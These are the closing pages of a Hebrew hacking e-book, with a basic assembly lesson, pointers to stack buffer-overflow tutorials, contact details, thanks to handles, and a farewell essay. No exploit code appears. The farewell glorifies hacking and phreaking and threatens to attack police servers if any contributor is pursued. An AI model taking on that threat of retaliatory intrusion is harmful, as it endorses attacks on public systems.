‫(‪mov ax, 123; )ax123‬‬
‫פעולת חיבור בין שני ערכים ‪add -‬‬
‫צורה ‪add op1, op2; -‬‬
‫;‪mov ax, 12‬‬
‫;‪mov bx, 12‬‬
‫(‪add ax, bx; )ax  24‬‬
‫פעולת חיסור בין שני ערכים ‪sub -‬‬
‫צורה ‪sub op1, op2; -‬‬
‫;‪mov ax, 12‬‬
‫;‪mov bx, 12‬‬
‫(‪sub ax, bx; )ax  0‬‬
‫אני חושב שזה מספיק בינתיים‪ ,‬עכשיו אני אתן לכם כמה תרגילים ‪ ,‬תעבדו עליהם‪ ,‬תיישמו את מה‬
‫שלמדתם וניפגש בכתבה הבאה שלי‪ ,‬עד אז‪ ,‬יבוא שלום על ישראל‪.‬‬
‫האוגר ‪ ax‬קולט ערך ‪ ,12‬האוגר ‪ bx‬קולט ערך ‪ ,15‬האוגר ‪ cx‬קולט ערך ‪ 18‬ואז עושים חשבון בין כולם‪,‬‬
‫אוגר ‪ ax‬יהיה שווה ‪.45‬‬
‫אם לא תצליחו אז אני מוסיף בסוף העמוד את התשובה הנכונה‪:‬‬
‫להתראות ועד לפעם הבאה‪ ,‬שמרו על עצמכם‪pirsing ,‬‬

‫‪///////////////////‬‬
‫;‪mov ax, 12‬‬
‫;‪mov bx, 15‬‬
‫;‪mov cx, 18‬‬
‫;‪add ax, bx‬‬
‫;‪add ax, cx‬‬
‫‪///////////////////‬‬
‫‪:reference */‬‬
‫"המדריך לשפת אסמבלי" (הוצאת הוד עמי)‪ .‬יש שם המון זבל‪ ,‬אבל ה ‪ 10 -‬פרקים הראשונים‬
‫רלוונטיים לנו‪.‬‬
‫שמעתי על ספר מצויין בנושא של כותב ישראלי‪ ,‬לצערי אני לא זוכרת את השם‪ .‬אלי משהו‪ .‬‬
‫כמו כן‪ 2 ,‬מדריכים של פראק‪:‬‬
‫‪smashing the stack for fun and profit‬‬
‫‪win32 buffer overflows‬‬
‫הספר הראשון גם יציג לכם את תוכנת ‪ debug‬וכך תוכלו לנסות דוגמאות פשוטות כמו הדוגמאות‬

‫הנ"ל‪ .‬אין צורך להוריד תוכנת אסמבלר (לא קוראים לזה "קומפיילר"‪ ,‬כי זאת לא שפת עילית)‬
‫מורכבת כמו ‪ masm‬לצורך הזה‪.‬‬
‫בלאדי‪/* .‬‬
‫]]‪eof‬‬
‫‪by blood runner‬‬

‫‪144-144-144-144-144‬‬

‫‪[[eof‬‬

‫צרו קשר‬
‫שלום ‪.‬‬
‫הכל טוב ?‬
‫נגמרו הכתבות ‪ ,‬עכשיו נעבור לשלושת העמודים המסיימים את הספר ‪...‬‬
‫איך ליצור קשר ‪:‬‬
‫אוקי ‪ ...‬אני לא אענה על שאלות כמו ‪:‬‬
‫‪.1‬תפרוץ לי בבקשה ‪.‬‬
‫‪.2‬שכחתי את הסיסמא של האי מאייל אנא תעזור לי‬
‫‪.3‬אני חייב שתפרוץ לי לאנשהו‬
‫‪.4‬אני ישלם לך בעד שתפרוץ‬
‫‪.5‬ועוד שטויות מהסוג הזה‬
‫אני לא מבטיח לענות לכל אחד אבל מבטיח לנסות אז ככה ‪...‬‬
‫אני הולך לפרסם את האי סי קיו שלי ואני יודע שהוא הולך להיות מוצף באנשים אז חבר'ס בבקשה‬
‫אל תעלבו אם אני לא עונה ‪ ...‬יש לי עכשיו קרוב ל‪ 30‬אנשים און‪-‬ליין ‪...‬‬
‫‪my icq - 124157810‬‬
‫לתגובות‪ ,‬להסביר כמה שאת\ה אוהבת אותי או כמה שאת\ה שונאת אותי ‪ -‬בקיצור כל מה שלא קשור‬
‫לשאלות שלחו לי ל ‪:‬‬
‫‪efraim abramov@inbox.net‬‬
‫לשאלות תשלחו איי מאייל ל ‪:‬‬
‫‪hacker@asm.net‬‬
‫ומי שרוצה להצטרף לכותבי הספר הבא ( כנראה שנה הבאה ) אנא שלחו כתבות גם ל ‪:‬‬
‫‪efraim abramov@inbox.net‬‬
‫אם תרצו ליצור קשר עם אחד ההאקרים\קראקרים האחרים בספר שלחו לי הודעה עם השאלה ואני‬
‫כבר יצור את הקשר בניכם ‪...‬‬
‫‪by efraim abramov‬‬

‫תודות‬
‫זהו אין יותר עבודה עד ‪ 2:30‬בלילה ‪ -‬עכשיו נשאר רק לכתוב תודות ()‪:‬‬
‫טוב קדימה‪ ,‬נתחיל זה ארוך ‪....‬‬
‫תודה ענקית למי שבלעדיהם לא היה לכם את הספר ‪:‬‬
‫‪gehenom, blood runner, rul3r, pirs[i]ng, e-man , aiti , dr.brain , jacob, asc, batman911, sbh,‬‬
‫‪catax, bentz, y0g1 b3ar, icefire3k, rel8t, milki, aka, vb-man, cool-guy, zeos, bor|s, wamaw,‬‬
‫‪panchermaher, boba smith, ^dak0da^, zebra, vortex, the-mod, ndr311, counter and to all the‬‬
‫‪. hackers in the world‬‬
‫ועכשיו נעבור לתודות בעברית ‪:‬‬
‫פנצ'ו‪ ,‬ניב ואשד ( התותחים הכי כבדים ‪,) ‬יוליה‪ ,‬אלה‪ ,‬גלה‪ ,‬גלית‪ ,‬אלי ‪ ,‬בן‪-‬לאדן ( השובב) ותודה‬
‫ענקית אחרונה למפכ"ל המשטרה (‪. :‬‬

‫סוף דבר‬
‫זהו זה עומד להסתיים עוד כמה רגעים‪ ,‬החלום שלי יתגשם סוף סוף‬
‫והספר יופץ ברחבי הנט ‪.‬‬
‫הספר הזה נכתב בשביל שלכם\ן יהיה את הכוח לדעת‪ ,‬מי שקרא את הספר הוא לא האקר ‪ -‬בשביל‬
‫להיות האקר את\ה צריך\ה ללמוד עוד הרבה דברים‪ ,‬בעיקר לשנות את דפוסי ההתנהגות‪ ,‬פעם שאלו‬
‫אותי איך זה להיות האקר וכך אמרתי ‪:‬‬
‫האם ראיתם את הסרט ‪ ? hackers‬אם כן זה דיי דומה אבל החלק השונה הוא שלרוב הפריצות הם‬
‫הרבה יותר קשות אבל הקטעים עם החברים והטלפוניה מזכירים במקצת את התרבות שלנו ‪ -‬אני‬
‫ממליץ לכולם לראות את הסרט ולהבין ‪.‬‬
‫זה הספר הראשון בעברית על האקינג (גם לא ידוע לי שיש באנגלית)‬
‫ונראה לי שזה יהיה האחרון ( הגמדים השמנים הכחולים בטח ירדפו אחריי‪ )...‬אבל אני מבטיח שאם‬
‫לספר זה יהיה פופלריות גדולה אנחנו נכתוב ספר בשנה הבאה ‪.‬‬
‫אז אני לא טוב בפרידות אבל זה הולך ככה (‪:‬‬
‫החלום התגשם ו ‪ 200 -‬ע"מ של האקינג\קראקינג\פריקינג\אנרכייה מחולקים בחינם לכל אדם ברחבי‬
‫הנט ‪ -‬הכחולים יעשו בעיות ואולי יתפסו אחד מאיתנו‪ ,‬אני מזהיר שאם הם יטפלו באחד‬
‫ההאקרים בגלל הספר הסרבר שלהם יצטרך להזיע כמו שבן‪-‬לאדן עכשיו מזיע בתוך האהל שלו !‬
‫אני מבקש מכל ממך להפיץ את הספר לכמה שיותר אנשים וזה רק בגלל שהרעיון של הספר הוא‬
‫הפצת המידע בחינם לכל דורש ‪.‬‬
‫תודה לכם על זה שקראתם את הספר‪ ,‬מקווה שנהניתן\ם ‪.‬‬
‫‪by efraim abramov‬‬

‫‪eof‬‬

Sign up to vote on this title
UsefulNot useful